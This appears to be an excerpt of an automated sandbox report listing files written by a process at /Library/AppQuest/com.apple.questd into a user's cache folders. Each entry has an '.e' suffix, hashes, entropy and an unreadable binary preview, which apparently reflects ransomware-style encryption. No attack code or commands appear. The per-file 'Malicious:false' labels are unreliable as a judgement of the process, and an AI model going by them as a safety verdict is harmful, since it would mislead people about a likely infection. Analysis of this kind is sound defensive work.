                                                                                                    Entropy (8bit):3.258194115144692
                                                                                                    Encrypted:false
                                                                                                    MD5:D427E8349A037455EDEE4C5A85891A70
                                                                                                    SHA1:EDD0F906FC4D8970558CE4F5931B9D5436650D0D
                                                                                                    SHA-256:CC377A6EF4AE330E65321E19AA0F7332A2FEFE18374C4F4BE741F4FED11466A6
                                                                                                    SHA-512:C3566A424886ED47E675719FBCC619BE8D4EA36CEB5030415DB900AEC58EF4F4CD005F8D42EAFE4ED2A3AFA46AE03833CFE735DA5E8157E037E8A4A1CE85FBEC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexPositionTable.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8506
                                                                                                    Entropy (8bit):3.4368870083962206
                                                                                                    Encrypted:false
                                                                                                    MD5:8F3EE5E7D7FD1FD5C91D0CC4CA7553A4
                                                                                                    SHA1:795984F0901345D670CB784CD0584D543D4C9669
                                                                                                    SHA-256:194A32856079ACCFC639864329344FC427550E7275BEDFB52F56A2CD0D6EBBF6
                                                                                                    SHA-512:BE7605ECB8E7520E47C03FB84568431BA0342DC9462522BE28DCB84FB3324555C666AF4EA0806396CFF95EFC61043A4A34301DA28B43A6185BFCC978E116C2E6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexPositions.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.6142495434483934
                                                                                                    Encrypted:false
                                                                                                    MD5:16A5AE02EF104373F6A63943EF2239EB
                                                                                                    SHA1:FF245914ED51AF1CB55DDB004EB969736C0BF7D5
                                                                                                    SHA-256:80C506A3284FC73CD478A59CE72DC0B7957AE620866A77EF2A09D425D6D66F89
                                                                                                    SHA-512:68B4C65D6722C5BA31203361F8B11EB6576C242855F25246079273406490D708FB96FAA0C73D60AA788FC3F066FCCCBBD2CF9B740160DB60B8E1310490591370
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexPostings.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.596448943244238
                                                                                                    Encrypted:false
                                                                                                    MD5:90AE1A92DA90FE5EE280C1E07BF952E4
                                                                                                    SHA1:23A88588F4D4FF819918F4D88BAB95371C865C7C
                                                                                                    SHA-256:72F36FA1CCA962FBCDB9007AE62762C3C4C2291F5416D82577529B33A01DCDA1
                                                                                                    SHA-512:782EA8AF0CB9EEA91F18A59174B4E0B6B83F7F16B71250CD379F106FF4B4ABE905812E1824540F49E01B113EA08108EADBA9F1724B6393693618317C4F2C3CAF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexTermIds.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8506
                                                                                                    Entropy (8bit):3.4361764835049837
                                                                                                    Encrypted:false
                                                                                                    MD5:7E5CDDB34372F5E56848E0ED4751546E
                                                                                                    SHA1:25F92EFC1AE9BDF5A39296A0A3314DCC70090612
                                                                                                    SHA-256:B22C753BD93887F8A17F78C897E82594D61487661245E1E31D72343766E24A2A
                                                                                                    SHA-512:D46F1C8C6FC2CB9D6F46A369BFD747D9E021BA04BC84E14B835427F2D8B6D946FDAFAE4CB7EAEF7B2AEF2FE8ECCDE42D8D96F9EAECF627C1857FA88140E92C2F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexUpdates.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexArrays.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):65877
                                                                                                    Entropy (8bit):3.2234033440730427
                                                                                                    Encrypted:false
                                                                                                    MD5:EC29C5937C07377EE50BFA46210A0958
                                                                                                    SHA1:7ADDAC3BDB89B8AE3E24BABEE5587C36378E8D93
                                                                                                    SHA-256:C6DAE69807EB9661D3CE1B9AAC03B2583C888F74136DC5C877147C844D44FB73
                                                                                                    SHA-512:5C707782A7B22523A998FFF387DCDA11D856F29FCA81214A865EF3928F4E9B2E82F525F1965B3FC6D1D5B8E5BB8B0231C6E6F6BFBEA6E1AC5477EEE1A652A217
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\............................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexCompactDirectory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):322
                                                                                                    Entropy (8bit):4.462020037776213
                                                                                                    Encrypted:false
                                                                                                    MD5:DEC6760D3C94DA333CC794D01E04D933
                                                                                                    SHA1:1B7085D2E3D95C5C366858B95F3F8A0C90F489AF
                                                                                                    SHA-256:63D5A64651B6A9E165E18AE321489082086251E949EE38C9DD41C4AA2ABB20AC
                                                                                                    SHA-512:8357714290D01A6D6B09697DCED42B87BC5A694B42987C3D98B0A769C88C50F6076E28AC046EAABCEB3BD60D7CC85FE799B9E47FCED2988C0FB5272797F213FF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\.............................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexDirectory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):2370
                                                                                                    Entropy (8bit):3.895969507608954
                                                                                                    Encrypted:false
                                                                                                    MD5:23545E3E5A87632A7327698A96B09EBC
                                                                                                    SHA1:E7B4D46E6371BF91F2220E3EFC620DF125A0CD9E
                                                                                                    SHA-256:787F6DC479187FDC2BEF6C9566037D3557325D7399CF214395410E52EB1D1970
                                                                                                    SHA-512:8CF74D9D182CEB468F638E872B0DA547D416C15AF9D61213710B465909AE9B539CEEDAA33AD6DA1ED2E6223A871785E6C2EDD534F2D01AB57BB9220E431FC6CA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\............................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexGroups.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):314
                                                                                                    Entropy (8bit):4.3677739492521335
                                                                                                    Encrypted:false
                                                                                                    MD5:929934939205E2A2DE6B620D0F32EEDD
                                                                                                    SHA1:279C79AD6D4650BA119914F6B82BDB9F1B4CBBF3
                                                                                                    SHA-256:D9F3796997B3A54AB1D81ED008A6E984AC8E19F0E2008F980648CAC8D5325169
                                                                                                    SHA-512:CF246B401D6E42FA9FB2AE847A07104F1439CB5F39688E629511E9BF49132F3D0975BC57B6989E860DC3107B7483464FE07C981D5B787310E7A340397077E40D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..........................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexHead.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.835825790933229
                                                                                                    Encrypted:false
                                                                                                    MD5:B8561D34E8BFFF145DCCCED9CFFE4548
                                                                                                    SHA1:DCA9B33ACC3DE1EA9EB14BE4E7F845E3D3A21DDE
                                                                                                    SHA-256:385B07D4C23DEBC842EE362BF8437C6F97EEE14FB8C4056FE97A953D882A374D
                                                                                                    SHA-512:FBB3DDC0ED4E391AD494E486A7E264B38DE22AAB562D8139A81B72F2791275977BB724F7A5A04FA5DC48A9077A087DF11741072E85F185C4BC25A3F96702F63C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .J..'ry..b..1...r}4........1k...a..v...L...sf..H).R.,\##d....k..................!c...t..........'<1...f|~.....}P..#an.Fr.`m.v.........s.6.c.B.UG.................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexPositionTable.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexTermIds.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.store.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):906025
                                                                                                    Entropy (8bit):6.998879967673639
                                                                                                    Encrypted:false
                                                                                                    MD5:AA0CF6EF39F00B18145A13C96F349B6E
                                                                                                    SHA1:95EA557EBE93D9704126938BF20E1B847A7132A8
                                                                                                    SHA-256:82C3154A3DA57728857C0E96C1C8089CC9FAB31B951D89F93707EEE3B46E35A6
                                                                                                    SHA-512:D30F32D210FF09329C73465799C5768E028488E60C5D4A959B6ED29094AF259222F41BE3470F828BF35D00A323541EC5DBDEDC88CB6D23AA1014F712C483A4FC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..=A.WbJ.4...4G.OC...cwu..~.Jp.2....G._...W...4..^O[.Q4Z.......$.P.74............L.D<.+.........................................................................................................................................................................................................................................'.........-..:........d..e....,..MN.z>...sw..P...D.~g.|B.....4].$v0.}.f.................................................................................................................................................................................................%..,Q..3.X...7.+._J9s.)..................9.o..h$.=.e......../..:.........................................................................................................w..A..3.........sU...|M....................\..........._.......C.5..'..UV......R..ZV[.......v..K..}"...!..x4g..s.._...E........1..Zh.(.....B.8N.......,Zp....I...(.w....P.74...Z.X..x.5k..uS.GW........................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.store.updates.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):314
                                                                                                    Entropy (8bit):4.376547476329088
                                                                                                    Encrypted:false
                                                                                                    MD5:4AB48EB36D742FBE0D1FE2C6B8E8CF50
                                                                                                    SHA1:0A1AA3DB2E0BE20AC6FAE3209200A91DC3BE6075
                                                                                                    SHA-256:B7A44F75ADB5E72077D0EE480E92AF64EBFCA08F20F9455A343BF40625453AE8
                                                                                                    SHA-512:5D4F13932AD1E3B63E973BDAC106E13DE95BFECE4E02A1A945FED13B77A8F9F6BCF608B851020839D2674CC84DB84122F23631932B5FD754AAD8D7A3F9B74AC4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: $. ...Z0..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.tmp.spotlight.state.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.6314802213436774
                                                                                                    Encrypted:false
                                                                                                    MD5:8B4A5EDCFDB18148E52B3CAF42D3A1A7
                                                                                                    SHA1:0EFDA7F0CE25563379A8392542466B9BD791C6BA
                                                                                                    SHA-256:05819F0964176EB6F78CEFF34F5371253D4203E4EB490543405149A3B0256C5B
                                                                                                    SHA-512:41F9B53945C52F952FE54106F350701B99EE6901B947FA08AD185D2FC372A2B4D3BD541AD7353DF6872A2E2083ED6ABA6577997B772A77A490DCA5001F34DC4F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@1BC.|,.OA.....................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.keyboardservicesd/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.348074505582378
                                                                                                    Encrypted:false
                                                                                                    MD5:31F0D17D7882202C7A06F7158A91924A
                                                                                                    SHA1:4AE2EA8AC3A0520AA4F14AA83F55204AEA2DAD2F
                                                                                                    SHA-256:65B228C0FB87B6132478686DE1775BCBB3170D3869364E1E40BF3F0E2C9F994F
                                                                                                    SHA-512:F60FB5B86D67288EFFBF3181638221B5038AEA7E9AC136ED0CB4972ABB16907528A9741ECE01C157F81C0A8534806738C3EFE4FAE7A52E800A83F8ACFBE42364
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i....tqv..,[.r.a^.K#*...5p.q}%68.B..>.k....L.B. i....tqv..,[.r.a^.K#t..}.m2#}%68.B..........}.BP..$+.9.o..h$........@...+....g..gm,._.Y..<.!.......0!8..A...E....N^...'LI....b..1....................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.keyboardservicesd/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53933
                                                                                                    Entropy (8bit):4.471546391844276
                                                                                                    Encrypted:false
                                                                                                    MD5:2175B8BF08B1442FB3FD244B559341C5
                                                                                                    SHA1:CADB5555957E1150D1DDB9C067A5559C9CCE009E
                                                                                                    SHA-256:A8EE634A59D0AC7490475073E62A2A38178C2529445D65DC07155A261591C4D0
                                                                                                    SHA-512:F1DA9CFCD4D1A72C456D8D524DCF0526804FA5DF06EA2F947AE9733F7542A76A019218B411689CD19B8C3B7C0FB97109A870868AF7EEE3AE03A6410B1AA448F6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$...*...5p.q..p...&....ON.2.*...5p.q.&.....C...~.....S-6...z.........L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.keyboardservicesd/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.5795710402491183
                                                                                                    Encrypted:false
                                                                                                    MD5:6E3FEB776674EAA33DB274F8BE4D8A8A
                                                                                                    SHA1:B1B851E3D6BFE5C0798BC938551A6630EF849541
                                                                                                    SHA-256:B39B11B8DBD598B9DC3928352C7E196E4B34C0B37E4AC9243831F4D2E84FC1FD
                                                                                                    SHA-512:5318713BD4E3E30B482736825B86B4306B79BA17C38F7C4D63AB68BA893482D30C9A0AE4059E9383E37591B0A393E00111F9B7BCBFAF63B5CA91672C83C198BF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!7........Ax&..t..].;5.X...d~(....@8..`.8.........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):4.499741925830698
                                                                                                    Encrypted:false
                                                                                                    MD5:C89BC4C7AA3851BF6B32386D14201F54
                                                                                                    SHA1:C202351853ADE13E5CB435DCB6CA30296284AA31
                                                                                                    SHA-256:7E89867B20A192012CF48081260E258447960A6195C7B1F461C68B62794C33DC
                                                                                                    SHA-512:8A2A24DFCC65CC6FCB85F3CEE5AA19F6750B5CE3C2A2C56C6E9E33B459A89C20020ADA440614D5E79BD33AD3CB744526E7FF6A94462F05FF8B669EAAA8168068
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L..4.[...y.~.8......R."OB.A.S........l.z!>.k....L..4.[...y.~.8......R."OBRU.a........l.z!........Y ...Jl..9.o..h$.................H.P...jh......\.%9j...c\.[O.j.!..1..z.z......,....-.......;D..3..(%..z7..(.w...W.m.^e..,..=-H|R..T.J...Ky....#D!.-$~.....:....=..~r....{m./..........c.h....]O.&..]...Q...o".xm_w.c;..`...`x.?.v.$.;.!U".L+./........CX.%W9..\O..>4..]U.V..E"=. .m...4.7.O.Ia..}.....BW#.....>..v...CFg%...l..i...@+..e....D..&/.'.ES.w...<m.5.s\.8.m..v{.e.M|..&..;...,.@.&...........LG......`.....b.3.o.....:...u.O...'e`.....%.U.;.L.9.w....L2..v.i.....gW.If.7..<@...../.7..N2.g..J7Fg.Ee5/..5...v.nh.uB....lf.GO[...B....`.........']......1.|...w.......pd....uq.'H.&...xM.G.[.(>`......t\&G..a#Rs.t.....!.]f1....=2...<.+..A.n.0.dB..l.p...n..K.."..wI..1.n.E_9.6...0<.-|.........C+..]..6*^..#0ey....k....e....D}... .)z..=...01o.^...H.....?.l.1:..(.g...........V.6..!.$I3Y.u.8.J[f._3,.@..44L.j.V.H....P3...]...h.O"...z#z.Mo.C".xQM....B..$...yt...w.U.EI.?.....bB.-..%!..@\.l..A+,.......@Q.....e
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1830625
                                                                                                    Entropy (8bit):7.756405035180592
                                                                                                    Encrypted:false
                                                                                                    MD5:3C80FF8D0AC6EBD8DE9198C6B3EF3133
                                                                                                    SHA1:55A6F2DC374AAEA3D22D4AD37C92F2DFC3EE77CE
                                                                                                    SHA-256:C59695D6F0C863164E66EA4F0DC55CCD52AFB985F693344D43393B9DB88055AA
                                                                                                    SHA-512:EE51F423832B5B0CEDCE1D87A943C3DB98A08493D57CCC4FCF1A47E8F3E85B6C722723FC6EF4EC2CD8D579B56309BFA7B7BD3A644CD7114F631C82105F1A0A5B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$....A.S....%....W...9....3f.A.S.....b.yK..l.my. v)....L,............L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1856819
                                                                                                    Entropy (8bit):7.744407245471346
                                                                                                    Encrypted:false
                                                                                                    MD5:632E1C4E67A504AD68F5BBA1375D9EDC
                                                                                                    SHA1:C6A02F20C4AEE3D773FAF650A7E4B2444469137D
                                                                                                    SHA-256:87C32DAB9348547C037D7271F52B3E29B53C325EE3892F44C182060D147BB553
                                                                                                    SHA-512:33D0E5EBE9E45BA7F4E3B2F1D407A214E48BA22A8307B6BCF4870CF5132EFB0D7CE5881AA3854C54FCFBBAD8A4C3145BAF734C0BB47E957B2730907888BBDB01
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t......6.d\%..!}.U.....5.~./..efrt...7...t...7............L.D<.+......~B...1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.03D306B2-A372-4238-AFDF-E1B96A316589.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):20059
                                                                                                    Entropy (8bit):6.0088232058080475
                                                                                                    Encrypted:false
                                                                                                    MD5:01F22880A3630A3E8B32CA4D83881C57
                                                                                                    SHA1:C4783DF367DD04C536B053D7A16C413A64F83F57
                                                                                                    SHA-256:7C38450E59965896EB50246459568DC841A95220370030D8BAD4392D5D086A86
                                                                                                    SHA-512:9D1B949D80DD57BE97F55B142FF11451BCAE11783B7B76ADAD538877A3880D756DABA72D7DAC63624D7796CD20871632DC1C0263F5F00C3CDDB24471A33F3BD7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj50...O.............[.|ct....f)....@|....h.nG....-..)s.Y...R...K...J.a.0\!G.(x...h..".z........j@..+.t}..Y!.....2.....5..h...gt....O.5.5+{!.F8)H..y..GA...J....~..t.#..M5.Z'.......\..dq...".N..5...fV..... {..:...Y..s.../,J..:7..@G...r-......VJ.-C...5.AW....y0.t.A@.B']..z+...D...{4.6v^.....c,_..SA.....OSl%-......V...V.T..%..P......4?$.!.f..]....v.k...:.{...Kb.Uf^4L...f....v.K.&.sa1.....b.hy.....P.o3. ....9rF{.....-....p../.v).&..l.S.... .........*...P.o3. ....9rF..j'.....^._.b.........+.u.?.\~.v4H...e.O:....#....P.o3...K..w....`...A/f^4L...f....v.K.&.sa1......D... f..].....I.H.....+..a:...V;.^...9.;...N.WI.(?...;.A....Q.....=....\w.o... F....y...P.o3.REt*...v...........H.D..>..........n.^....-/..U0|.eh0.Or%.pV.c.f...P.o3...j;0..K...C. a2...H.D..>.......=fOz......b..&~W...P.o3.,t..].[b_..G;.-....Y.;y[.....u....<...U....O...u._.\]5c...D2..f.I...,.g.3^}...)...dW.......Z...3b..hw......[.!.$....--@+...i"...f.k...4g...zK..."......|...)..v.....9N..p)..0%`...9..a0K....8.?....P.o3.
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.0718DFF3-0531-4720-90C1-2FA705FAF1A3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17067
                                                                                                    Entropy (8bit):5.52158254115112
                                                                                                    Encrypted:false
                                                                                                    MD5:6526A0D988CFAA76413AD0FD9521FAD1
                                                                                                    SHA1:A5BD60424D9F8CDD3907718BBC228C69C50BD202
                                                                                                    SHA-256:CB20D414F94AD83352A9E1B126BC918274657480D627FDC38C27EB25DFDFB08E
                                                                                                    SHA-512:AC78813E41F759BD13412B897BBD760F1742E8FFAE644B5D0915C49E8AE86091C39CD2CF5EC2832DBF6E224EF56C5A535BA2FC44E2BDFF10484746AEC50EDE25
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj...1p....n..1..#0..&9..3....f)....@|........9#v.-..)s.Y...R...K...J.a.0\!G.(x...h..".z........j@..+.t}..Y!.....2.....5..h...gt....O.5.5+{!.F8)H..y..GA...J....~..t.#..M5.Z'.......\..dq...".N..5...fV..... {..:...Y..s.../,J..:7..@G...r-......VJ.-C...5.AW....y0.t.A@.B']..z+...D...{4.6v^.....c,_..SA.....OSl%-......V...V.T..%..P......4?$.!.f..]....v.k...:.{...Kb.Uf^4L...f....v.K.&.sa1.....b.hy.....P.o3. ....9rF{.....-....p../.v).&..l.S.... .........*...P.o3. ....9rFa...E.@..#.3.R)_....&f.VH.......\n...cI~...P.o3..gK...d.{..9.,'].n!..X.....~NRJ....#n.....=....."...?G..'...32.O....a....2..vA.U.(........dTJc.....Y.;y[.....u...J.Jd4..4.....4m.n.)(...#.+.Tp.....P.o3.kIK..I.^.\.....M.......+.u.?.\~....r....f..]....v.k...:....H....J..]...V..5.N.K}.}....:.......u.%...t.....b..#...mz.j......M.4Kf.V;.^...9.;...N...j....D.82.....f..].....I.H....=$.8.....n!..X.....~NRJ..f2..k......!C.Bf..]......X...........d|....E..?.|..&).......x.W7#;1{.B.K4.Zo...".4..u\.dXA.D.[B.c.~......UP...g.'...j=.
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.1C49D6A7-429F-4AFA-A237-D190DE250568.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):23011
                                                                                                    Entropy (8bit):7.985421884498603
                                                                                                    Encrypted:false
                                                                                                    MD5:069EBE556319C12D80DEB762463408FD
                                                                                                    SHA1:CE256C81C576948D3BE9D342661E9156B35D6B52
                                                                                                    SHA-256:DDF5FE84E7A59B0559A886FD939423883C000A8BA22DF73991CE935BB28F9207
                                                                                                    SHA-512:5D9995F514C249CF3A55B9F12EFB2BAE4FA01187CC82897945242FD5E429FE4B49F6792614E6B1AABE50343DC151523E9F1A3247CECE5B3D7C7193DD4041B8DB
                                                                                                    Malicious:false
